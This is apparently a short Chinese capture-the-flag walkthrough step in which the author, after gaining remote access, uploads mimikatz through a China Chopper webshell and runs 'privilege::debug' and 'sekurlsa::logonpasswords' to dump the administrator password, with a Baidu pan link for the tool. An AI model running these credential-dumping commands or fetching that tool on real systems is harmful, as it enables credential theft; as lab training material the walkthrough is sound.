1.接上一章,远程服务器后,找到桌面的文件夹,发现压缩包“想要找到小芳吗”,打开以后发现有解压密码,根据“SEVEN小芳”文件的提示得知,密码为administrator账号的登录密码
2.通过菜刀上传mimikatz到目标机进行密码爆破,
爆破命令:
第一条:privilege::debug
//提升权限
第二条:sekurlsa::logonpasswords
//抓取密码
软件下载地址: https://pan.baidu.com/s/10RkthjZndPOEmYHb-wDmZw
提取码:c8pl
3.获取到密码:wow!yougotit!